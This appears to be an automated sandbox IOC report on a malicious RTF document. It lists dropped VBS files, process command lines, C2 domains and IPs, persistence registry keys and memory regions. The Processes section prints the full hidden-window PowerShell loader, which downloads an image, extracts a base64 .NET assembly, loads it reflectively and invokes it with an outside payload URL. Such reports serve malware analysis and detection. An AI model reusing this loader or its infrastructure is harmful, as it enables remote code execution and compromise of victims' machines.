IOC Report
nU7Z8sPyvf.rtf

Files

File Path
Type
Category
Malicious
nU7Z8sPyvf.rtf
Rich Text Format data, version 1
initial sample
malicious
C:\ProgramData\antre.vbs
ASCII text, with very long lines (332), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\indexphppagenotfound[1].gif
Unknown
dropped
malicious
C:\Users\user\AppData\Local\Temp\note\nots.dat
data
dropped
malicious
C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs
Unknown
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\e1cCs[1].txt
Unicode text, UTF-8 text, with very long lines (11453), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{311FE58D-0A0A-4906-BBEA-A4F14D5BBA3F}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{41861850-5C7E-478B-A22E-FDD1B51B9935}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E2F14953-7834-4109-8F97-B0AFE5CAF451}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\bv4ftu3g.tqs.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\iadnmix3.urp.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\iuqdab5m.hza.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\karhafqd.k2v.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [folders]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nU7Z8sPyvf.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Wed May 1 11:54:57 2024, length=78038, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$7Z8sPyvf.rtf
data
dropped
\Device\Mup\YPSIACH*\MAILSLOT\NET\NETLOGON
data
dropped

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs"
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\antre.vbs"
malicious

URLs

Name
IP
Malicious
https://uploaddeimagens.com.br/images/004/
unknown
malicious
http://geoplugin.net/json.gp
178.237.33.50
malicious
sembe.duckdns.org
malicious
https://uploaddeimagens.com.br/images/00
unknown
malicious
http://geoplugin.net/json.gp/C
unknown
malicious
https://uploaddeimagens.com.br
unknown
malicious
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
172.67.215.45
malicious
http://107.172.31.6/28088/HHRM.txt
107.172.31.6
malicious
http://nuget.org/NuGet.exe
unknown
http://crl.entrust.net/server1.crl0
unknown
http://ocsp.entrust.net03
unknown
https://paste.ee/d/e1cCsG
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
https://analytics.paste.ee
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://paste.ee/d/e1cCs
104.21.84.67
http://app01.system.com.br/RDWeb/Pages/login.aspxd
unknown
https://www.google.com
unknown
https://paste.ee/d/e1cCs5
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://geoplugin.net/json.gp(GZ&
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://paste.ee/
unknown
https://analytics.paste.ee;
unknown
http://go.microsoft.c
unknown
https://cdnjs.cloudflare.com
unknown
http://app01.system.com.br/RDWeb/Pages/login.aspx70
unknown
https://cdnjs.cloudflare.com;
unknown
http://app01.system.com.br/RDWeb/Pages/login.aspxL
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
http://app01.system.com.br/RDWeb/Pages/login.aspx
unknown
http://crl.entrust.net/2048ca.crl0
unknown

Domains

Name
IP
Malicious
sembe.duckdns.org
194.187.251.115
malicious
uploaddeimagens.com.br
172.67.215.45
malicious
paste.ee
104.21.84.67
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
107.172.31.6
unknown
United States
malicious
172.67.215.45
uploaddeimagens.com.br
United States
malicious
194.187.251.115
sembe.duckdns.org
United Kingdom
malicious
178.237.33.50
geoplugin.net
Netherlands
104.21.84.67
paste.ee
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Path
malicious
HKEY_CURRENT_USER\Software\Rmc-999Z97
exepath
malicious
HKEY_CURRENT_USER\Software\Rmc-999Z97
licence
malicious
HKEY_CURRENT_USER\Software\Rmc-999Z97
time
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
~&.
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
6(.
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
d*.
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\28A45
28A45
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\32BA2
32BA2
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\32BA2
32BA2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\32BA2
32BA2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\32BA2
32BA2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings

Memdumps

34D0000
trusted library allocation
page read and write
3951000
heap
page read and write
262B000
trusted library allocation
page read and write
37C000
heap
page read and write
BC1000
heap
page read and write
53B0000
heap
page read and write
1B0000
trusted library allocation
page read and write
280000
heap
page read and write
DF000
heap
page read and write
34D0000
trusted library allocation
page read and write
757000
heap
page read and write
20000
heap
page read and write
4BB1000
heap
page read and write
4C50000
trusted library allocation
page read and write
4C50000
trusted library allocation
page read and write
456F000
stack
page read and write
36F000
heap
page read and write
254E000
stack
page read and write
2A9A000
heap
page read and write
5A0000
heap
page read and write
D50000
trusted library allocation
page read and write
4CB3000
heap
page read and write
34D0000
trusted library allocation
page read and write
49DE000
stack
page read and write
374000
heap
page read and write
3BE000
stack
page read and write | page guard
34D0000
trusted library allocation
page read and write
6A0000
heap
page read and write
2A83000
heap
page read and write
535F000
stack
page read and write
2728000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
53B4000
heap
page read and write
36D000
stack
page read and write
A30000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
18C000
stack
page read and write
34D0000
trusted library allocation
page read and write
2A83000
heap
page read and write
4CFE000
stack
page read and write
34F7000
heap
page read and write
4D34000
heap
page read and write
34E5000
heap
page read and write
3573000
heap
page read and write
2390000
trusted library allocation
page read and write
4A5000
heap
page read and write
300000
heap
page read and write
600000
trusted library allocation
page execute and read and write
24B6000
heap
page execute and read and write
34D0000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
306E000
stack
page read and write
4EBF000
heap
page read and write
1D95000
heap
page read and write
30AC000
stack
page read and write
48D000
heap
page read and write
C2D0000
trusted library allocation
page read and write
2DBE000
stack
page read and write
2C50000
heap
page read and write
4C50000
trusted library allocation
page read and write
2A5F000
heap
page read and write
4BC0000
heap
page read and write
4E41000
heap
page read and write
A58000
heap
page read and write
4A8C000
stack
page read and write
27C3000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
39D000
stack
page read and write
250E000
stack
page read and write
89000
stack
page read and write
41B0000
heap
page read and write
336000
heap
page read and write
97000
heap
page read and write
1F7000
stack
page read and write
466E000
stack
page read and write
34D0000
trusted library allocation
page read and write
2710000
heap
page read and write
3340000
heap
page read and write
4B1C000
stack
page read and write
88000
stack
page read and write
55A000
heap
page read and write
662000
heap
page read and write
4BB4000
heap
page read and write
4FB0000
heap
page read and write
35B8000
heap
page read and write
984000
heap
page read and write
27C7000
trusted library allocation
page read and write
DF0000
trusted library allocation
page read and write
2561000
trusted library allocation
page read and write
4A9000
heap
page read and write
33BC000
stack
page read and write
95E000
stack
page read and write
2C2F000
stack
page read and write
7FC000
heap
page read and write
1D04000
heap
page read and write
5BF4000
heap
page read and write
4402000
trusted library allocation
page read and write
2AB3000
heap
page read and write
2A61000
heap
page read and write
4C34000
heap
page read and write
2500000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
F7E000
stack
page read and write
36A000
heap
page read and write
2C4000
heap
page read and write
CF0000
trusted library allocation
page read and write
4EF7000
heap
page read and write
5FDE000
stack
page read and write
4AA000
heap
page read and write
46D000
heap
page read and write
43AE000
stack
page read and write
4C50000
trusted library allocation
page read and write
4B5B000
stack
page read and write
B0E000
stack
page read and write
3D11000
trusted library allocation
page read and write
560000
heap
page read and write
35CF000
heap
page read and write
416C000
stack
page read and write
81E1000
trusted library allocation
page read and write
DCE000
trusted library allocation
page read and write
2520000
heap
page execute and read and write
78C000
heap
page read and write
4A9000
heap
page read and write
34D0000
trusted library allocation
page read and write
5B5E000
stack
page read and write
2A6F000
heap
page read and write
5FE0000
heap
page read and write
4C11000
heap
page read and write
6AB000
heap
page read and write
B1E1000
trusted library allocation
page read and write
4AE000
heap
page read and write
190000
trusted library allocation
page read and write
23BD000
trusted library allocation
page read and write
666000
heap
page read and write
478000
remote allocation
page execute and read and write
1B7000
trusted library allocation
page execute and read and write
2A62000
heap
page read and write
4AD000
heap
page read and write
39A0000
heap
page read and write
1FD0000
heap
page read and write
68F000
heap
page read and write
4430000
heap
page read and write
34D0000
trusted library allocation
page read and write
3573000
heap
page read and write
4A1E000
stack
page read and write
269A000
trusted library allocation
page read and write
4D4D000
heap
page read and write
4DCE000
stack
page read and write
4C50000
trusted library allocation
page read and write
4A6000
heap
page read and write
4B4E000
stack
page read and write
34D0000
trusted library allocation
page read and write
2A64000
heap
page read and write
2C0000
trusted library allocation
page read and write
3562000
heap
page read and write
3740000
heap
page read and write
3E29000
heap
page read and write
39E0000
heap
page read and write
37F000
heap
page read and write
2BBE000
stack
page read and write
3B7000
heap
page read and write
35B7000
heap
page read and write
550000
heap
page read and write
12C000
stack
page read and write
41DF000
heap
page read and write
34D0000
trusted library allocation
page read and write
ACE000
stack
page read and write
4A8F000
stack
page read and write
3D14000
trusted library allocation
page read and write
4C35000
heap
page read and write
3E7000
heap
page read and write
9AE000
stack
page read and write
EC000
heap
page read and write
10000
heap
page read and write
2A6A000
heap
page read and write
349000
trusted library allocation
page read and write
23A0000
trusted library allocation
page read and write
2380000
trusted library allocation
page read and write
4BE0000
trusted library allocation
page read and write
1D30000
heap
page read and write
5B7000
heap
page read and write
53E000
stack
page read and write
97000
stack
page read and write
4FF000
stack
page read and write
312C000
stack
page read and write
847000
heap
page read and write
7C4000
heap
page read and write
40EE000
stack
page read and write
29AF000
stack
page read and write
34D0000
trusted library allocation
page read and write
EB0000
trusted library allocation
page read and write
EBE000
stack
page read and write